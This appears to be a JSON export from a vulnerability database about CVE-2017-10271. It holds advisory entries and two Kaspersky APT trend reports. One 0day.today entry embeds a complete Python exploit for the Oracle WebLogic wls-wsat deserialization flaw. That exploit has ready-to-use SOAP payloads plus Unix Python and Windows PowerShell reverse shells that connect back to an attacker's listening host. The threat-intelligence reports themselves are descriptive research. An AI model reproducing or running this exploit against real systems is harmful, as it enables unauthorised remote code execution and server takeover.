version)\n\n_FIREALARM_\n\n * e2c2d8bad36ac3e446797c485ce8b394\n\n_SPOTLIGHT_\n\n * d70068de37d39a7a01699c99cdb7fa2b\n * 1300d1f87b73d953e20e25fdf8373c85\n * 3bca4c659138e769157f49942824b61f\n", "modified": "2018-09-19T10:00:00", "published": "2018-09-19T10:00:00", "id": "FIREEYE:C097B41677EDE5F95DB4B84AD6726751", "href": "https://www.fireeye.com/blog/threat-research/2018/09/click-it-up-targeting-local-government-payment-portals.html", "type": "fireeye", "title": "Click It Up: Targeting Local Government Payment Portals", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-03-21T00:16:24", "description": "The Oracle WebLogic WLS WSAT component is vulnerable to an XML deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.", "edition": 1, "published": "2018-01-29T00:00:00", "type": "zdt", "title": "Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-10271"], "modified": "2018-01-29T00:00:00", "href": "https://0day.today/exploit/description/29668", "id": "1337DAY-ID-29668", "sourceData": "", "sourceHref": "https://0day.today/exploit/29668", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-14T17:44:57", "description": "Exploit for multiple platform in category remote exploits", "edition": 1, "published": "2018-01-08T00:00:00", "type": "zdt", "title": "Oracle WebLogic < 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-10271"], "modified": "2018-01-08T00:00:00", "href": "https://0day.today/exploit/description/29395", "id": "1337DAY-ID-29395", "sourceData": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# Exploit Title: Weblogic wls-wsat Component Deserialization RCE\r\n# Date Authored: Jan 3, 2018\r\n# Date Announced: 10/19/2017\r\n# Exploit Author: Kevin Kirsche (d3c3pt10n)\r\n# Exploit Github: https://github.com/kkirsche/CVE-2017-10271\r\n# Exploit is based off of POC by Luffin from Github\r\n# https://github.com/Luffin/CVE-2017-10271\r\n# Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html\r\n# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0\r\n# Tested on: Oracle WebLogic 10.3.6.0.0 running on Oracle Linux 6.8 and Ubuntu 14.04.4 LTS\r\n# CVE: CVE-2017-10271\r\n# Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/\r\n# (Python 3) Example check listener: python3 -m http.server 4444\r\n# (Python 2) Example check listener: python -m SimpleHTTPServer 4444\r\n# (Netcat) Example exploit listener: nc -nlvp 4444\r\n \r\nfrom sys import exit\r\nfrom requests import post\r\nfrom argparse import ArgumentParser\r\nfrom random import choice\r\nfrom string import ascii_uppercase, ascii_lowercase, digits\r\nfrom xml.sax.saxutils import escape\r\n \r\nclass Exploit:\r\n \r\n def __init__(self, check, rhost, lhost, lport, windows):\r\n self.url = rhost if not rhost.endswith('/') else rhost.strip('/')\r\n self.lhost = lhost\r\n self.lport = lport\r\n self.check = check\r\n if windows:\r\n self.target = 'win'\r\n else:\r\n self.target = 'unix'\r\n \r\n if self.target == 'unix':\r\n # Unix reverse shell\r\n # You should also be able to instead use something from MSFVenom. E.g.\r\n # msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444\r\n self.cmd_payload = (\r\n \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.\"\r\n \"SOCK_STREAM);s.connect((\\\"{lhost}\\\",{lport}));os.dup2(s.fileno(),0); os.dup2(\"\r\n \"s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\"\r\n ).format(lhost=self.lhost, lport=self.lport)\r\n else:\r\n # Windows reverse shell\r\n # Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444\r\n self.cmd_payload = (\r\n r\"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) \"\r\n r\"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='\" + self.lhost +\"\"\r\n r\"';$p='\"+ self.lport + \"';$c=New-Object system.net.sockets.tcpclient;$c.connect($a\"\r\n r\",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;\"\r\n r\"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';\"\r\n r\"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;\"\r\n r\"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;\"\r\n r\"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;\"\r\n r\"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};\"\r\n r\"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;\"\r\n r\"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)\"\r\n r\" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;\"\r\n r\"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};\"\r\n r\"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if \"\r\n r\"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne\"\r\n r\" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.\"\r\n r\"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\"\r\n )\r\n self.cmd_payload = escape(self.cmd_payload)\r\n \r\n def cmd_base(self):\r\n if self.target == 'win':\r\n return 'cmd'\r\n return '/bin/sh'\r\n \r\n def cmd_opt(self):\r\n if self.target == 'win':\r\n return '/c'\r\n return '-c'\r\n \r\n \r\n def get_generic_check_payload(self):\r\n random_uri = ''.join(\r\n choice(ascii_uppercase + ascii_lowercase + digits)\r\n for _ in range(16))\r\n generic_check_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\r\n <object id=\"url\" class=\"java.net.URL\">\r\n <string>http://{lhost}:{lport}/{random_uri}</string>\r\n </object>\r\n <object idref=\"url\">\r\n <void id=\"stream\" method = \"openStream\" />\r\n </object>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>\r\n'''\r\n \r\n return generic_check_payload.format(\r\n lhost=self.lhost, lport=self.lport, random_uri=random_uri)\r\n \r\n def get_process_builder_payload(self):\r\n process_builder_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java>\r\n <object class=\"java.lang.ProcessBuilder\">\r\n <array class=\"java.lang.String\" length=\"3\" >\r\n <void index=\"0\">\r\n <string>{cmd_base}</string>\r\n </void>\r\n <void index=\"1\">\r\n <string>{cmd_opt}</string>\r\n </void>\r\n <void index=\"2\">\r\n <string>{cmd_payload}</string>\r\n </void>\r\n </array>\r\n <void method=\"start\"/>\r\n </object>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>\r\n'''\r\n return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),\r\n cmd_payload=self.cmd_payload)\r\n \r\n def print_banner(self):\r\n print(\"=\" * 80)\r\n print(\"CVE-2017-10271 RCE Exploit\")\r\n print(\"written by: Kevin Kirsche (d3c3pt10n)\")\r\n print(\"Remote Target: {rhost}\".format(rhost=self.url))\r\n print(\"Shell Listener: {lhost}:{lport}\".format(\r\n lhost=self.lhost, lport=self.lport))\r\n print(\"=\" * 80)\r\n \r\n def post_exploit(self, data):\r\n headers = {\r\n \"Content-Type\":\r\n \"text/xml;charset=UTF-8\",\r\n \"User-Agent\":\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36\"\r\n }\r\n payload = \"/wls-wsat/CoordinatorPortType\"\r\n \r\n vulnurl = self.url + payload\r\n try:\r\n req = post(\r\n vulnurl, data=data, headers=headers, timeout=10, verify=False)\r\n if self.check:\r\n print(\"[*] Did you get an HTTP GET request back?\")\r\n else:\r\n print(\"[*] Did you get a shell back?\")\r\n except Exception as e:\r\n print('[!] Connection Error')\r\n print(e)\r\n \r\n def run(self):\r\n self.print_banner()\r\n if self.check:\r\n print('[+] Generating generic check payload')\r\n payload = self.get_generic_check_payload()\r\n else:\r\n print('[+] Generating execution payload')\r\n payload = self.get_process_builder_payload()\r\n print('[*] Generated:')\r\n print(payload)\r\n if self.check:\r\n print('[+] Running generic check payload')\r\n else:\r\n print('[+] Running {target} execute payload').format(target=self.target)\r\n \r\n self.post_exploit(data=payload)\r\n \r\n \r\nif __name__ == \"__main__\":\r\n parser = ArgumentParser(\r\n description=\r\n 'CVE-2017-10271 Oracle WebLogic Server WLS Security exploit. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.'\r\n )\r\n parser.add_argument(\r\n '-l',\r\n '--lhost',\r\n required=True,\r\n dest='lhost',\r\n nargs='?',\r\n help='The listening host that the remote server should connect back to')\r\n parser.add_argument(\r\n '-p',\r\n '--lport',\r\n required=True,\r\n dest='lport',\r\n nargs='?',\r\n help='The listening port that the remote server should connect back to')\r\n parser.add_argument(\r\n '-r',\r\n '--rhost',\r\n required=True,\r\n dest='rhost',\r\n nargs='?',\r\n help='The remote host base URL that we should send the exploit to')\r\n parser.add_argument(\r\n '-c',\r\n '--check',\r\n dest='check',\r\n action='store_true',\r\n help=\r\n 'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.'\r\n )\r\n parser.add_argument(\r\n '-w',\r\n '--win',\r\n dest='windows',\r\n action='store_true',\r\n help=\r\n 'Use the windows cmd payload instead of unix payload (execute mode only).'\r\n )\r\n \r\n args = parser.parse_args()\r\n \r\n exploit = Exploit(\r\n check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport,\r\n windows=args.windows)\r\n exploit.run()\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/29395", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "securelist": [{"lastseen": "2019-10-16T11:39:54", "bulletinFamily": "blog", "cvelist": ["CVE-2017-10271"], "description": "\n\nFor more than two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q3 2019.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact intelreports@kaspersky.com.\n\n## **The most remarkable findings**\n\nOn August 30, Ian Beer from Google's Project Zero team published an extensive analysis of at least 14 iOS zero-days found in the wild and used in five exploitation chains to escalate privileges by an unknown threat actor. Although the use of watering-hole attacks was popular in the early 2010s, it has now become less common. According to Google, a number of waterholed websites were delivering the exploits, possibly as far back as three years ago (based on September 2016 usage of the first exploit chain). While the blog contains no details about the compromised sites or if they are still active, it claims that these websites receive \"thousands of visitors per week\". The first stage Webkit exploit used to infect visitors makes no discrimination other than that the victim uses an iPhone and browses the website with Safari, although the vulnerability would also have worked in other browsers such as Chrome. The lack of victim discrimination would point to a relatively non-targeted attack, but the not-so-high estimate of the number of visitors to the waterholed sites seems to indicate that the attack was targeted at some communities: it is likely that these waterholed sites were all dedicated to some common topic. The blog does not contains many details regarding who the actor behind this attack is, but the high technical capabilities needed to deliver and install this malware, and keep the exploitation chains up-to-date for more than two years, shows a high level of resources and dedication. Upon infection, the malware itself will be invisible to the victim. It pings its C2 every 60 seconds for new commands. It is able to get access to all kinds of files in the system, as well as tracking GPS position. There is no mechanism to survive a reboot, but the capability to steal signing-in cookies from a victim's account can keep providing the attackers with access to this data.\n\nShortly after the Google blogpost, Volexity published more details about the waterholing websites used in the attack to distribute the malware, pointing to a \"strategic web compromise targeting Uyghurs\". Citizen Lab published the Android counterpart for this story, stating that between November 2018 and May 2019, senior members of Tibetan groups were targeted by the same actor (this time dubbed POISON CARP by Citizen Lab) using malicious links in WhatsApp text exchanges, with the attackers posing as NGO workers, journalists and other fake personas. The links led to code designed to exploit web browser vulnerabilities to install spyware on iOS and Android devices, and in some cases to OAuth phishing pages.\n\nAt the beginning of September 2019, Zerodium, a zero-day brokerage firm, indicated that a zero-day for Android was now worth more than one for iOS: the exploit broker is now willing to pay $2.5 million for a zero-click Android zero-day with persistence. This is a significant increase on the company's previous payout ceiling of $2 million for remote iOS jailbreaks. By contrast, Zerodium [has also reduced payouts](<https://threatpost.com/android-zero-days-worth-more-iphone-exploits/147981/>) for Apple one-click exploits. On the same day, a high-severity zero-day was found in the v412 (Video4Linux) driver, the Android media driver. This vulnerability, which could enable privilege escalation, [was not included](<https://threatpost.com/android-zero-day-bug-opens-door-to-privilege-escalation-attack-researchers-warn/148014/>) in Google's September security update. A few days later, an Android flaw was identified that left more than a billion Samsung, Huawei, LG and Sony smartphones vulnerable to an attack that would allow an attacker to [gain full access](<https://www.independent.co.uk/life-style/gadgets-and-tech/news/android-security-flaw-hack-samsung-huawei-phone-text-message-sms-a9093111.html>) to emails on a compromised device using an SMS message.\n\n## **Russian-speaking activity**\n\nTurla (aka Venomous Bear, Uroburos and Waterbug) has made significant changes to its toolset. While investigating malicious activity in Central Asia, we identified a new backdoor that we attribute with medium confidence to this APT group. The malware, named Tunnus, is a.NET-based backdoor with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the C2 infrastructure has been built using compromised sites with vulnerable WordPress installations. According to our telemetry, Tunnus activity started in March and was still active when we published our private report in July.\n\nTurla has also wrapped its notorious JavaScript KopiLuwak malware in a dropper called Topinambour, a new.NET file that the group is using to distribute and drop KopiLuwak through infected installation packages for legitimate software programs such as VPNs. Some of the changes are to help Turla evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. The malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. Two KopiLuwak analogues \u2013 the.NET RocketMan Trojan and the PowerShell MiamiBeach Trojan \u2013 are used for cyber-espionage. We think that the threat actor deploys these versions where their targets are protected with security software capable of detecting KopiLuwak. All three implants can fingerprint targets, gather information on system and network adapters, steal files and download and execute additional malware. MiamiBeach is also able to take screenshots.\n\nIn September, Zebrocy spear-phished multiple NATO and alliance partners throughout Europe, attempting to gain access to email communications, credentials and sensitive documents. This campaign is similar to past Zebrocy activity, with target-relevant content used within emails, and ZIP attachments containing harmless documents alongside executables with altered icons and identical filenames. The group also makes use of remote Word templates pulling contents from the legitimate Dropbox file sharing site. In this campaign, Zebrocy targeted defense and diplomatic targets located throughout Europe and Asia with its Go backdoor and Nimcy variants.\n\n## **Chinese-speaking activity**\n\nHoneyMyte (aka Temp.Hex and Mustang Panda), which has been active for several years, has adopted different techniques to perform its attacks over the past couple of years, and has focused on various targeting profiles. In previous attacks, conducted from mid-2018, this threat actor deployed PlugX implants, as well as multi-stage PowerShell scripts resembling CobaltStrike. That campaign targeted government entities in Myanmar, Mongolia, Ethiopia, Vietnam and Bangladesh. We recently described a new set of activities from HoneyMyte involving attacks that relied on several types of tools. They include: (a) PlugX implants; (b) a multi-stage package resembling the CobaltStrike stager and stageless droppers with PowerShell and VB scripts,.NET executables, cookie-stealers and more; (c) ARP poisoning with DNS hijacking malware, to deliver poisoned Flash and Microsoft updates over http for lateral movement; (d) various system and network utilities. Based on the targeting of government organizations related to natural resource management in Myanmar and a major continental organization in Africa, we assess that one of the main motivations of HoneyMyte is gathering geo-political and economic intelligence. While a military organization was targeted in\n\nBangladesh, it's possible that the individual targets were related to geopolitical activity in the region.\n\nSince the beginning of 2019, we have observed a spike in LuckyMouse activity, both in Central Asia and the Middle East. For these new campaigns, the attackers seem to focus on telecommunications operators, universities and governments. The infection vectors are direct compromise, spear phishing and, possibly, watering holes. LuckyMouse hasn't changed any of its TTPs (Tactics, Techniques and Procedures), continuing to rely on its own tools to get a foothold in the victim's network. The new campaigns consist of HTTPBrowser as a first stage, followed by the Soldier Trojan as a second-stage implant. The attackers made a change to their infrastructure, as they seem to solely rely on IPv4 addresses instead of domain names for their C2s, which can be seen as an attempt by them to limit correlation. The campaigns from this actor were still active at the time we published our latest private report on LuckyMouse in September.\n\nOur January 2018 private report 'ShaggyPanther \u2013 Chinese-speaking cluster of activity in APAC' introduced ShaggyPanther, a previously unseen malware and intrusion set targeting Taiwan and Malaysia. Related components and activity span back over a decade, with similar code maintaining compilation timestamps as far back as 2004. Since then ShaggyPanther activity has been detected in several more locations: the most recent detections occurred on servers in Indonesia in July, and, somewhat surprisingly, in Syria in March. The newer 2018 and 2019 backdoor code maintains a new layer of obfuscation and no longer maintains clear-text C2 strings. Since our original release, we have identified an initial server-side infection vector from this actor, using SinoChoper/ChinaChopper, a commonly used webshell shared across multiple Chinese-speaking actors. SinoChopper is not only used to perform host identification and backdoor delivery but also email archive theft and additional activity. Though not all incidents can be traced back to server-side exploitation, we did detect a couple of cases and obtained information about their staged install process. In 2019 we observed ShaggyPanther targeting Windows servers.\n\n## **Middle East**\n\nOn August 1, Dragos published an overview of attacks called 'Oil and Gas Threat Perspective Summary', which references an alleged new threat actor they call Hexane. According to the report, \"HEXANE targets oil and gas and telecommunications in Africa, the Middle East, and Southwest Asia\". Dragos claims to have identified the group in May 2019, associating it with OilRig and CHRYSENE. Although no IoCs have been made publicly available, some researchers have shared hashes in a Twitter thread in response to the Dragos announcement. Our analysis reveals some low-confidence similarities with OilRig based on TTPs, which is something that Dragos also mentions in its research. If this is indeed the case, the recent leaks from Lab Dookhtegan and GreenLeakers offer several hypotheses about this group's emergence. Due to exposure and leaks, OilRig may simply have changed its toolset and continued to operate as usual: this would imply a quick and flexible response to the leaks from this actor. Or perhaps some of the OilRig TTPs were adopted by a new group that seems to have similar interests. Hexane's activity appears to have started around September 2018 with a second wave of activity starting in May 2019. In all cases, the artefacts used in the attacks are relatively unsophisticated. The constant evolution of the droppers seems to indicate a trial-and-error period where attackers were testing how best to evade detection. The TTPs we can link to previous OilRig activity include the described trial-and-error process, the use of simplistic unsophisticated droppers distributed through spear phishing and DNS-based C2 exfiltration.\n\nTortoiseShell is a new cluster of activities associated with an unknown APT actor, revealed by Symantec on September 18, 2019. Symantec claims that the first signs of activity were seen in July 2018, and are still active one year later; Kaspersky has seen different TortoiseShell artifacts dating back to January 2018. To date, all registered attacks, according to our telemetry, are in Saudi Arabia. Symantec's report also confirms that the majority of the infections they found were in the same location. The attackers deploy their Syskit backdoor and then use it for reconnaissance. Other tools deployed on the victim machines are designed to collect files and pack them using RAR, gathering further system information. In one case, the attackers deployed the TightVNC remote administration tool to obtain full access to a machine. Symantec mentions traces of OilRig tools in some of the victims, something which we cannot confirm. Also, they mention in their blogpost the possibility that this was distributed through a supply chain attack. We were able to see the malware being distributed through a fake application distributed from a specifically created website for war veterans around two months before the publication of our report. The website was activated shortly after we published our report during a national holiday period in Saudi Arabia. However, we didn't find any compromised application that could suggest a supply chain attack.\n\n## **Southeast Asia and the Korean Peninsula**\n\nRecently we discovered new Android malware disguised as a mobile messenger or as cryptocurrency-related applications. The new malware has several connections with KONNI, a Windows malware strain that has been used in the past to target a human rights organization and an individual/organization with an interest in Korean Peninsula affairs. KONNI has also previously targeted cryptocurrencies. The infected apps don't steal cryptocurrencies from a specific trading application or switch wallet addresses; they implement full-featured functionalities to control an infected Android device and steal personal cryptocurrency using these features. We worked closely with a local CERT in order to take down the attacker's server, giving us a chance to investigate it.\n\nWe recently tracked new BlueNoroff activity. In particular, we identified a bank in Myanmar that was compromised by this actor and promptly contacted it to share the IoCs we had found. This collaboration allowed us to obtain valuable information on how the attackers move laterally to access high value hosts, such as those owned by the bank's system engineers interacting with SWIFT. They use a public login credential dumper and homemade PowerShell scripts for lateral movement. BlueNoroff also employs new malware with an uncommon structure, probably to slow down analysis. Depending on the command line parameters, this malware can run as a passive backdoor, an active backdoor or a tunneling tool; we believe the group runs this tool in different modes depending on the situation. Moreover, we found another type of PowerShell script used by this threat actor when it attacked a target in Turkey. This PowerShell script has similar functionality to those used previously, but BlueNoroff keeps changing it to evade detection.\n\nKaspersky observed a recent campaign utilizing a piece of malware referred to by FireEye as DADJOKE. This malware was first used in the wild in January 2019 and has undergone constant development since then. We have only observed this malware being used in a small number of active campaigns since January, all targeting government, military, and diplomatic entities in the Southeast Asia region. The latest campaign was conducted on August 29 and seems to have targeted only a select few individuals working for a military organization.\n\nThe Andariel APT group, considered to be a sub-group of Lazarus, was initially described by the South Korean Financial Security Institute (FSI) in 2017. This threat actor has traditionally focused on geopolitical espionage and financial intelligence in South Korea. We have released several private intelligence reports on the group. We recently observed new efforts by this actor to build a new C2 infrastructure targeting vulnerable Weblogic servers, in this case exploiting CVE-2017-10271. Following a successful breach, the attackers implanted malware signed with a legitimate signature belonging to a South Korean security software vendor. Thanks to the quick response of the South Korean CERT, this signature was soon revoked. The malware is a brand new type of backdoor, called ApolloZeus, started by a shellcode wrapper with complex configuration data. This backdoor uses a relatively large shellcode in order to make analysis difficult. In addition, it implements a set of features to execute the final payload discreetly. The discovery of this malware allowed us to find several related samples, as well as documents used by the attackers to distribute it, providing us with a better understanding of the campaign. Indeed, we believe this attack is an early preparation stage for a new campaign, which also points to the attacker's intentions to replace their malware framework with the newly discovered artifacts.\n\n## **Other interesting discoveries**\n\nThe well-known Shadow Brokers leak Lost in Translation included an interesting Python script \u2013sigs.py \u2013 that contained lots of functions to check if a system had already been compromised by another threat actor. Each check is implemented as a function that looks for a unique signature in the system, for example, a file with a unique name or registry path. Although some checks are empty, 44 entries are listed in sigs.py, many of them related to unknown APTs that have not yet been publicly described. In 2018, we identified the APT described as the 27th function of the sigs.py file, which we call DarkUniverse. We assess with medium confidence that DarkUniverse is connected with the [ItaDuke](<https://www.fireeye.com/blog/threat-research/2013/02/its-a-kind-of-magic-1.html>) set of activity due to unique code overlaps. The main component is a rather simple DLL with only one exported function that implements persistence, malware integrity, communication with the C2 and control over other modules. We found about 20 victims in Western Asia and Northeastern Africa, including medical institutions, atomic energy bodies, military organizations and telecommunications companies.\n\nSince the beginning of 2019, we have observed the operation of new RCS (Remote Control System) implants for Android. RCS uses watermarks for different customers, which allowed us to correlate post-leak activity in the wild to obtain a global picture of how this malware is still being used, including the most recent cases. We detected RCS being used in Ethiopia in February, while additional samples with the same watermark were also detected in Morocco. The deployment method used depends on the actor, but the most common method consists of sending a legitimate backdoored application with RCS directly to the target using IM services (Telegram and WhatsApp).\n\n## **Final thoughts**\n\nIn seeking to evade detection, threat actors are refreshing their toolsets. This quarter, we have seen this clearly in Turla's development of its Tunnus backdoor and Topinambour dropper.\n\nHowever, when a new campaign is observed, it's not always immediately clear whether the tools used are the result of an established threat actor revamping its tools or a completely new threat actor making use of the tools developed by an existing APT group. In the case of Hexane, for example, it's unclear if this is a new development by OilRig, or the use of OilRig TTPs by a new group with similar interests in the Middle East, Africa and Southwest Asia.\n\nKorean-focused APT campaigns continue to dominate activities in Southeast Asia, a trend we first noted in our Q2 report.\n\nDespite the lower payouts by Zerodium for iOS exploits relative to those for Android, it's clear that mobile exploits continue to fetch very high prices. Our research into the ongoing use of RCS implants for Android and the revelations about the use of multiple iOS zero-days as described by Google and Citizen Lab underline the fact that mobile platforms have now become a standard aspect of APT attacks.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it needs to be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "modified": "2019-10-16T10:00:26", "published": "2019-10-16T10:00:26", "id": "SECURELIST:2782756D428D10F166A1D130F4307D33", "href": "https://securelist.com/apt-trends-report-q3-2019/94530/", "type": "securelist", "title": "APT trends report Q3 2019", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-12-11T13:21:36", "bulletinFamily": "blog", "cvelist": ["CVE-2017-10271", "CVE-2019-0797"], "description": "\n\nWhat were the most interesting developments in terms of APT activity during the year and what can we learn from them?\n\nThis is not an easy question to answer, because researchers have only partial visibility and it\u00b4s impossible to fully understand the motivation for some attacks or the developments behind them. However, let\u00b4s try to approach the problem from different angles in order to get a better understanding of what happened with the benefit of hindsight and perspective.\n\n## Compromising supply chains\n\nTargeting supply chains has proved very successful for attackers in recent years \u2013 high-profile examples include [ShadowPad](<https://securelist.com/shadowpad-in-corporate-networks/81432/>), [ExPetr](<https://securelist.com/schroedingers-petya/78870/>) and [the backdooring of CCleaner](<https://www.wired.com/story/ccleaner-malware-targeted-tech-firms/>). In our [threat predictions for 2019](<https://securelist.com/kaspersky-security-bulletin-threat-predictions-for-2019/88878/>), we flagged this as a likely continuing attack vector. We didn't have to wait very long to see this prediction come true.\n\nIn January, we discovered a sophisticated supply-chain attack involving a popular consumer hardware vendor, the mechanism used to deliver BIOS, UEFI and software updates to vendor's laptops and desktops. The attackers behind Operation ShadowHammer added a backdoor to the utility and then distributed it to users through official channels. The goal of the attack was to target with precision an unknown pool of users, identified by their network adapter MAC addresses. The attackers hardcoded a list of MAC addresses into the Trojanized samples, representing the true targets of this massive operation. We were able to extract over 600 unique MAC addresses from more than 200 samples discovered in this attack, although it's possible that other samples exist that target different MAC addresses. You can read our reports on ShadowHammer [here](<https://securelist.com/operation-shadowhammer/89992/>) and [here](<https://securelist.com/operation-shadowhammer-a-high-profile-supply-chain-attack/90380/>).\n\n## Disinformation\n\nQ3 was interesting for APT developments in the Middle East, especially considering the multiple leaks of alleged Iranian activity that were published within just a few weeks of each other. Even more interesting is the possibility that one of the leaks may have been part of a disinformation campaign carried out with the help of the Sofacy/Hades actor.\n\nIn March, someone going by the handle Dookhtegan or Lab_dookhtegan started posting messages on Twitter using the hashtag #apt34. They shared several files via Telegram that supposedly belonged to the OilRig threat actor. These included logins and passwords of several alleged hacking victims, tools, details of infrastructure potentially related to different intrusions, the r\u00e9sum\u00e9s of the alleged attackers and a list of web shells \u2013 apparently relating to the period 2014-18. The targeting and TTPs are consistent with the OilRig threat actor, but it was impossible to confirm the origins of the tools included in the dump. If the data in the dump is accurate, it would also show the global reach of the OilRig group, which most researchers had thought operates primarily in the Middle East.\n\nOn April 22, an entity going by the alias Bl4ck_B0X created a Telegram channel named GreenLeakers. The purpose of the channel, as stated by its creator, was to publish information about the members of the MuddyWater APT group, \"along with information about their mother and spouse and etc.\" for free. In addition to this free information, the Bl4ck_B0X actor(s) also hinted that they would put up for sale \"highly confidential\" information related to MuddyWater. On April 27, three screenshots were posted in the GreenLeakers Telegram channel containing alleged screenshots from a MuddyWater C2 server. On May 1, the channel was closed to the public and its status was changed to private. This was before Bl4ck_B0X had the chance to publish the promised information on the MuddyWater group. The reason for the closure is still unclear.\n\nFinally, a website named Hidden Reality published leaks allegedly related to an entity named the Iranian RANA institute. It was the third leak in two months disclosing details of alleged Iranian threat actors and groups. Interestingly, this leak differed from the others by employing a website that allowed anyone to browse the leaked documents. It also relied on Telegram and Twitter profiles to post messages related to Iranian CNO capabilities. The Hidden Reality website contains internal documents, chat messages and other data related to the RANA institute's CNO (computer network operations) capabilities, as well as information about victims. Previous leaks had focused more on tools, source code and individual actor profiles.\n\nClose analysis of the materials, the infrastructure and the dedicated website used by the leakers provided clues that lead us to believe that Sofacy/Hades may be connected to these leaks.\n\n## Lost in Translation and Dark Universe\n\nThe well-known Shadow Brokers leak, Lost in Translation, included an interesting Python script \u2013 sigs.py \u2013 that contained lots of functions to check if a system had already been compromised by another threat actor. Each check is implemented as a function that looks for a unique signature in the system \u2013 for example, a file with a unique name or registry path. Although some checks are empty, sigs.py lists 44 entries, many of them related to unknown APTs that have not yet been publicly described.\n\nIn 2019, we identified the APT described as the 27th function of the sigs.py file, which we call [DarkUniverse](<https://securelist.com/darkuniverse-the-mysterious-apt-framework-27/94897/>). We assess with medium confidence that DarkUniverse is connected with the ItaDuke set of activities due to unique code overlaps.\n\nThe main component is a rather simple DLL with only one exported function that implements persistence, malware integrity, communication with the C2 and control over other modules. We found about 20 victims in Western Asia and Northeastern Africa, including medical institutions, atomic energy bodies, military organizations and telecommunications companies.\n\n## Mobile attacks\n\nMobile implants are now a standard part of the toolset of many APT groups; and we have seen ample evidence of this during 2019.\n\nIn May, the [FT reported that hackers had exploited a zero-day vulnerability in WhatsApp](<https://www.ft.com/content/4da1117e-756c-11e9-be7d-6d846537acab>), enabling them to eavesdrop on users, read their encrypted chats, turn on the microphone and camera and install spyware that allows even further surveillance. To exploit the vulnerability, the attacker simply needed to call the victim via WhatsApp. This specially crafted call triggered a buffer overflow in WhatsApp, allowing the attacker to take control of the application and execute arbitrary code in it. The hackers apparently used this, not only to snoop on people's chats and 